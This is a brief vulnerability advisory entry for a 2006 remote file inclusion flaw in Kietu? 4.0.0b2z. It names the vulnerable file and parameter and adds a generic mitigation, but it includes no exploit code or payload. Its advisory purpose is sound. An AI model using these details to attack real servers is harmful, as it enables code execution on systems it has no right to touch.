vendor: Kietu?
by: D_7J
CVSS: N/A
N/A
Remote File Inclusion
CWE: 98
Product Name: Kietu?
Affected Version From: 4.0.0b2z
Affected Version To: 4.0.0b2z
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
Kietu? version 4.0.0b2z is vulnerable to Remote File Inclusion because the hit.php file does not sanitize user input. An attacker can exploit this by sending a malicious URL in the url_hit parameter, which allows the attacker to execute arbitrary code on the vulnerable server.
Mitigation:
Input validation should be used to prevent malicious user input from being passed to the application. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.